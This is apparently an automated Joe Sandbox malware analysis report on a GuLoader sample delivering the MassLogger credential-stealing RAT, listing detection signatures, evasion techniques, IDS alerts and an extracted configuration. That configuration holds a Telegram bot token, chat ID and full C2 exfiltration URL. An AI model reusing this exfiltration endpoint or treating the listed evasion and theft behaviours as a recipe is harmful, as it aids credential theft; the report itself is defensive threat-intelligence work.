Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
6ZoBPR3isG.exe

Overview

General Information

Sample name:6ZoBPR3isG.exe
renamed because original name is a hash value
Original sample name:e8e552351ba3c8a3f713a970b114fb7b80bd6474f62a88b977fe3bc35b57e9a7.exe
Analysis ID:1588191
MD5:dcae922f4d3c1946b3c41158be23dc2a
SHA1:13e891bfc3bcd410b284986d7baf8672255dcbdb
SHA256:e8e552351ba3c8a3f713a970b114fb7b80bd6474f62a88b977fe3bc35b57e9a7
Tags:exeGuLoaderuser-adrian__luca
Infos:

Detection

GuLoader, MassLogger RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected MassLogger RAT
Yara detected Telegram RAT
AI detected suspicious sample
Disable Task Manager(disabletaskmgr)
Disables CMD prompt
Disables the Windows task manager (taskmgr)
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • 6ZoBPR3isG.exe (PID: 7760 cmdline: "C:\Users\user\Desktop\6ZoBPR3isG.exe" MD5: DCAE922F4D3C1946B3C41158BE23DC2A)
    • 6ZoBPR3isG.exe (PID: 8068 cmdline: "C:\Users\user\Desktop\6ZoBPR3isG.exe" MD5: DCAE922F4D3C1946B3C41158BE23DC2A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"C2 url": "https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendMessage"}
{"EXfil Mode": "Telegram", "Telegram Token": "7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc", "Telegram Chatid": "7382809095"}
SourceRuleDescriptionAuthorStrings
00000003.00000002.2643502493.000000003418C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000003.00000002.2643502493.000000003418C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000003.00000002.2643502493.000000003418C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000000.00000002.1650191934.0000000003386000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          00000003.00000002.2616593291.00000000017C6000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Click to see the 3 entries
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T22:31:42.795136+010020577441Malware Command and Control Activity Detected192.168.2.349981149.154.167.220443TCP
            2025-01-10T22:31:44.660547+010020577441Malware Command and Control Activity Detected192.168.2.349983149.154.167.220443TCP
            2025-01-10T22:31:46.373821+010020577441Malware Command and Control Activity Detected192.168.2.349986149.154.167.220443TCP
            2025-01-10T22:31:48.072800+010020577441Malware Command and Control Activity Detected192.168.2.349988149.154.167.220443TCP
            2025-01-10T22:31:49.912050+010020577441Malware Command and Control Activity Detected192.168.2.349990149.154.167.220443TCP
            2025-01-10T22:31:51.599034+010020577441Malware Command and Control Activity Detected192.168.2.349992149.154.167.220443TCP
            2025-01-10T22:31:53.232416+010020577441Malware Command and Control Activity Detected192.168.2.349994149.154.167.220443TCP
            2025-01-10T22:31:54.979558+010020577441Malware Command and Control Activity Detected192.168.2.349996149.154.167.220443TCP
            2025-01-10T22:31:56.646913+010020577441Malware Command and Control Activity Detected192.168.2.349998149.154.167.220443TCP
            2025-01-10T22:31:58.500953+010020577441Malware Command and Control Activity Detected192.168.2.350000149.154.167.220443TCP
            2025-01-10T22:32:00.211457+010020577441Malware Command and Control Activity Detected192.168.2.350002149.154.167.220443TCP
            2025-01-10T22:32:02.065451+010020577441Malware Command and Control Activity Detected192.168.2.350004149.154.167.220443TCP
            2025-01-10T22:32:03.695686+010020577441Malware Command and Control Activity Detected192.168.2.350006149.154.167.220443TCP
            2025-01-10T22:32:05.323955+010020577441Malware Command and Control Activity Detected192.168.2.350008149.154.167.220443TCP
            2025-01-10T22:32:06.842799+010020577441Malware Command and Control Activity Detected192.168.2.350010149.154.167.220443TCP
            2025-01-10T22:32:08.522045+010020577441Malware Command and Control Activity Detected192.168.2.350012149.154.167.220443TCP
            2025-01-10T22:32:10.028089+010020577441Malware Command and Control Activity Detected192.168.2.350014149.154.167.220443TCP
            2025-01-10T22:32:11.703832+010020577441Malware Command and Control Activity Detected192.168.2.350016149.154.167.220443TCP
            2025-01-10T22:32:13.305255+010020577441Malware Command and Control Activity Detected192.168.2.350018149.154.167.220443TCP
            2025-01-10T22:32:14.921617+010020577441Malware Command and Control Activity Detected192.168.2.350020149.154.167.220443TCP
            2025-01-10T22:32:16.558067+010020577441Malware Command and Control Activity Detected192.168.2.350022149.154.167.220443TCP
            2025-01-10T22:32:18.201123+010020577441Malware Command and Control Activity Detected192.168.2.350024149.154.167.220443TCP
            2025-01-10T22:32:20.147674+010020577441Malware Command and Control Activity Detected192.168.2.350026149.154.167.220443TCP
            2025-01-10T22:32:21.894411+010020577441Malware Command and Control Activity Detected192.168.2.350028149.154.167.220443TCP
            2025-01-10T22:32:23.550116+010020577441Malware Command and Control Activity Detected192.168.2.350030149.154.167.220443TCP
            2025-01-10T22:32:25.157811+010020577441Malware Command and Control Activity Detected192.168.2.350032149.154.167.220443TCP
            2025-01-10T22:32:26.822595+010020577441Malware Command and Control Activity Detected192.168.2.350034149.154.167.220443TCP
            2025-01-10T22:32:28.441661+010020577441Malware Command and Control Activity Detected192.168.2.350036149.154.167.220443TCP
            2025-01-10T22:32:30.103458+010020577441Malware Command and Control Activity Detected192.168.2.350038149.154.167.220443TCP
            2025-01-10T22:32:31.717161+010020577441Malware Command and Control Activity Detected192.168.2.350040149.154.167.220443TCP
            2025-01-10T22:32:33.368274+010020577441Malware Command and Control Activity Detected192.168.2.350042149.154.167.220443TCP
            2025-01-10T22:32:34.949518+010020577441Malware Command and Control Activity Detected192.168.2.350044149.154.167.220443TCP
            2025-01-10T22:32:36.635993+010020577441Malware Command and Control Activity Detected192.168.2.350046149.154.167.220443TCP
            2025-01-10T22:32:38.396117+010020577441Malware Command and Control Activity Detected192.168.2.350048149.154.167.220443TCP
            2025-01-10T22:32:40.009407+010020577441Malware Command and Control Activity Detected192.168.2.350050149.154.167.220443TCP
            2025-01-10T22:32:41.690988+010020577441Malware Command and Control Activity Detected192.168.2.350052149.154.167.220443TCP
            2025-01-10T22:32:43.422528+010020577441Malware Command and Control Activity Detected192.168.2.350054149.154.167.220443TCP
            2025-01-10T22:32:45.173689+010020577441Malware Command and Control Activity Detected192.168.2.350056149.154.167.220443TCP
            2025-01-10T22:32:46.910708+010020577441Malware Command and Control Activity Detected192.168.2.350058149.154.167.220443TCP
            2025-01-10T22:32:48.558073+010020577441Malware Command and Control Activity Detected192.168.2.350060149.154.167.220443TCP
            2025-01-10T22:32:50.365152+010020577441Malware Command and Control Activity Detected192.168.2.350062149.154.167.220443TCP
            2025-01-10T22:32:52.063956+010020577441Malware Command and Control Activity Detected192.168.2.350064149.154.167.220443TCP
            2025-01-10T22:32:53.608952+010020577441Malware Command and Control Activity Detected192.168.2.350066149.154.167.220443TCP
            2025-01-10T22:32:55.407874+010020577441Malware Command and Control Activity Detected192.168.2.350068149.154.167.220443TCP
            2025-01-10T22:32:57.073739+010020577441Malware Command and Control Activity Detected192.168.2.350070149.154.167.220443TCP
            2025-01-10T22:33:01.419984+010020577441Malware Command and Control Activity Detected192.168.2.350072149.154.167.220443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T22:31:34.578497+010028032742Potentially Bad Traffic192.168.2.349979132.226.247.7380TCP
            2025-01-10T22:31:41.875333+010028032742Potentially Bad Traffic192.168.2.349979132.226.247.7380TCP
            2025-01-10T22:31:43.734718+010028032742Potentially Bad Traffic192.168.2.349982132.226.247.7380TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T22:31:28.793002+010028032702Potentially Bad Traffic192.168.2.349957172.217.16.206443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T22:31:42.502681+010018100081Potentially Bad Traffic192.168.2.349981149.154.167.220443TCP
            2025-01-10T22:31:44.296888+010018100081Potentially Bad Traffic192.168.2.349983149.154.167.220443TCP
            2025-01-10T22:31:46.023661+010018100081Potentially Bad Traffic192.168.2.349986149.154.167.220443TCP
            2025-01-10T22:31:47.725131+010018100081Potentially Bad Traffic192.168.2.349988149.154.167.220443TCP
            2025-01-10T22:31:49.422005+010018100081Potentially Bad Traffic192.168.2.349990149.154.167.220443TCP
            2025-01-10T22:31:51.226907+010018100081Potentially Bad Traffic192.168.2.349992149.154.167.220443TCP
            2025-01-10T22:31:52.992362+010018100081Potentially Bad Traffic192.168.2.349994149.154.167.220443TCP
            2025-01-10T22:31:54.576520+010018100081Potentially Bad Traffic192.168.2.349996149.154.167.220443TCP
            2025-01-10T22:31:56.344110+010018100081Potentially Bad Traffic192.168.2.349998149.154.167.220443TCP
            2025-01-10T22:31:58.069972+010018100081Potentially Bad Traffic192.168.2.350000149.154.167.220443TCP
            2025-01-10T22:31:59.844867+010018100081Potentially Bad Traffic192.168.2.350002149.154.167.220443TCP
            2025-01-10T22:32:01.560579+010018100081Potentially Bad Traffic192.168.2.350004149.154.167.220443TCP
            2025-01-10T22:32:03.401380+010018100081Potentially Bad Traffic192.168.2.350006149.154.167.220443TCP
            2025-01-10T22:32:05.014421+010018100081Potentially Bad Traffic192.168.2.350008149.154.167.220443TCP
            2025-01-10T22:32:06.626429+010018100081Potentially Bad Traffic192.168.2.350010149.154.167.220443TCP
            2025-01-10T22:32:08.187001+010018100081Potentially Bad Traffic192.168.2.350012149.154.167.220443TCP
            2025-01-10T22:32:09.814826+010018100081Potentially Bad Traffic192.168.2.350014149.154.167.220443TCP
            2025-01-10T22:32:11.486908+010018100081Potentially Bad Traffic192.168.2.350016149.154.167.220443TCP
            2025-01-10T22:32:13.012727+010018100081Potentially Bad Traffic192.168.2.350018149.154.167.220443TCP
            2025-01-10T22:32:14.625484+010018100081Potentially Bad Traffic192.168.2.350020149.154.167.220443TCP
            2025-01-10T22:32:16.250162+010018100081Potentially Bad Traffic192.168.2.350022149.154.167.220443TCP
            2025-01-10T22:32:17.871356+010018100081Potentially Bad Traffic192.168.2.350024149.154.167.220443TCP
            2025-01-10T22:32:19.521958+010018100081Potentially Bad Traffic192.168.2.350026149.154.167.220443TCP
            2025-01-10T22:32:21.566377+010018100081Potentially Bad Traffic192.168.2.350028149.154.167.220443TCP
            2025-01-10T22:32:23.239141+010018100081Potentially Bad Traffic192.168.2.350030149.154.167.220443TCP
            2025-01-10T22:32:24.930723+010018100081Potentially Bad Traffic192.168.2.350032149.154.167.220443TCP
            2025-01-10T22:32:26.485485+010018100081Potentially Bad Traffic192.168.2.350034149.154.167.220443TCP
            2025-01-10T22:32:28.148054+010018100081Potentially Bad Traffic192.168.2.350036149.154.167.220443TCP
            2025-01-10T22:32:29.807757+010018100081Potentially Bad Traffic192.168.2.350038149.154.167.220443TCP
            2025-01-10T22:32:31.428691+010018100081Potentially Bad Traffic192.168.2.350040149.154.167.220443TCP
            2025-01-10T22:32:33.080521+010018100081Potentially Bad Traffic192.168.2.350042149.154.167.220443TCP
            2025-01-10T22:32:34.684760+010018100081Potentially Bad Traffic192.168.2.350044149.154.167.220443TCP
            2025-01-10T22:32:36.272050+010018100081Potentially Bad Traffic192.168.2.350046149.154.167.220443TCP
            2025-01-10T22:32:37.963363+010018100081Potentially Bad Traffic192.168.2.350048149.154.167.220443TCP
            2025-01-10T22:32:39.727964+010018100081Potentially Bad Traffic192.168.2.350050149.154.167.220443TCP
            2025-01-10T22:32:41.335109+010018100081Potentially Bad Traffic192.168.2.350052149.154.167.220443TCP
            2025-01-10T22:32:43.019779+010018100081Potentially Bad Traffic192.168.2.350054149.154.167.220443TCP
            2025-01-10T22:32:44.755265+010018100081Potentially Bad Traffic192.168.2.350056149.154.167.220443TCP
            2025-01-10T22:32:46.491451+010018100081Potentially Bad Traffic192.168.2.350058149.154.167.220443TCP
            2025-01-10T22:32:48.273116+010018100081Potentially Bad Traffic192.168.2.350060149.154.167.220443TCP
            2025-01-10T22:32:49.876435+010018100081Potentially Bad Traffic192.168.2.350062149.154.167.220443TCP
            2025-01-10T22:32:51.682684+010018100081Potentially Bad Traffic192.168.2.350064149.154.167.220443TCP
            2025-01-10T22:32:53.379112+010018100081Potentially Bad Traffic192.168.2.350066149.154.167.220443TCP
            2025-01-10T22:32:54.999588+010018100081Potentially Bad Traffic192.168.2.350068149.154.167.220443TCP
            2025-01-10T22:32:56.736013+010018100081Potentially Bad Traffic192.168.2.350070149.154.167.220443TCP
            2025-01-10T22:33:01.011858+010018100081Potentially Bad Traffic192.168.2.350072149.154.167.220443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 6ZoBPR3isG.exeAvira: detected
            Source: 00000003.00000002.2643502493.000000003418C000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc", "Telegram Chatid": "7382809095"}
            Source: 6ZoBPR3isG.exe.8068.3.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendMessage"}
            Source: 6ZoBPR3isG.exeVirustotal: Detection: 41%Perma Link
            Source: 6ZoBPR3isG.exeReversingLabs: Detection: 60%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_36B9A700 CryptUnprotectData,3_2_36B9A700
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_36B9AE39 CryptUnprotectData,3_2_36B9AE39
            Source: 6ZoBPR3isG.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.3:49980 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.3:49957 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.217.16.129:443 -> 192.168.2.3:49963 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49981 version: TLS 1.2
            Source: 6ZoBPR3isG.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 0_2_0040672B FindFirstFileW,FindClose,0_2_0040672B
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 0_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405AFA
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_00402868 FindFirstFileW,3_2_00402868
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_0040672B FindFirstFileW,FindClose,3_2_0040672B
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,3_2_00405AFA
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 4x nop then jmp 36AEE41Ah3_2_36AEDFF2
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 4x nop then jmp 36AEDB79h3_2_36AED8C8
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 4x nop then jmp 36AEE41Ah3_2_36AEE347
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 4x nop then jmp 36B99DE5h3_2_36B99AA8
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 4x nop then jmp 36B9E3C8h3_2_36B9E120
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 4x nop then jmp 36B9F528h3_2_36B9F280
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 4x nop then jmp 36B9B1A0h3_2_36B9AEF8
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 4x nop then jmp 36B9F980h3_2_36B9F6D8
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 4x nop then jmp 36B9F0D0h3_2_36B9EE28
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 4x nop then jmp 36B998F9h3_2_36B99650
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 4x nop then jmp 36B9BA50h3_2_36B9B7A8
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 4x nop then jmp 36B9FDD8h3_2_36B9FB30
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 4x nop then jmp 36B9B5F8h3_2_36B9B350
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 4x nop then jmp 36B9C758h3_2_36B9C4B0
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 4x nop then jmp 36B98799h3_2_36B984F0
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 4x nop then jmp 36B9DF70h3_2_36B9DCC8
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 4x nop then jmp 36B9BEA8h3_2_36B9BC00
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 4x nop then jmp 36B9DB18h3_2_36B9D870
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 4x nop then jmp 36B9C300h3_2_36B9C058
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 4x nop then jmp 36B99049h3_2_36B98DA0
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 4x nop then jmp 36B994A1h3_2_36B991F8
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 4x nop then jmp 36B9EC78h3_2_36B9E9D0
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 4x nop then jmp 36B9E820h3_2_36B9E578
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 4x nop then jmp 36B98BF1h3_2_36B98948
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 4x nop then push 00000000h3_2_371F8770
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 4x nop then jmp 371F51ADh3_2_371F4FD0
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 4x nop then jmp 371F5B37h3_2_371F4FD0
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 4x nop then jmp 371F19D8h3_2_371F1730
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 4x nop then jmp 371F2288h3_2_371F1FE0
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 4x nop then jmp 371F40F0h3_2_371F3E48
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 4x nop then jmp 371F0FF0h3_2_371F0D48
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]3_2_371F9567
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 4x nop then jmp 371F3840h3_2_371F3598
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 4x nop then jmp 371F26E0h3_2_371F2438
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 4x nop then jmp 371F0740h3_2_371F0498
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_371F44CF
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_371F4CF3
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 4x nop then jmp 371F2F90h3_2_371F2CE8
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_371F4B13
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 4x nop then jmp 371F1E30h3_2_371F1B88
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 4x nop then push 00000000h3_2_371F92AF
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 4x nop then jmp 371F33E8h3_2_371F3140
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 4x nop then jmp 371F144Ah3_2_371F11A0
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 4x nop then jmp 371F3C98h3_2_371F39F0
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 4x nop then jmp 371F02E8h3_2_371F0040
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 4x nop then jmp 371F2B38h3_2_371F2890
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 4x nop then jmp 371F0B98h3_2_371F08F0
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 4x nop then push 00000000h3_2_3775C068
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]3_2_3775CE78
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 4x nop then push 00000000h3_2_3775CBB6

            Networking

            barindex
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50006 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:49992 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:49983 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50006 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:49983 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:49992 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50000 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50000 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50012 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50038 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50012 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:49998 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50052 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:49998 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50068 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50058 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50068 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50022 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50050 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50058 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50038 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50052 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50050 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50022 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50014 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50014 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:49990 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50030 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50030 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:49981 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50036 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50004 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:49981 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50036 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:49990 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50004 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.3:50018 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.3:50018 -> 149.154.167.220:443
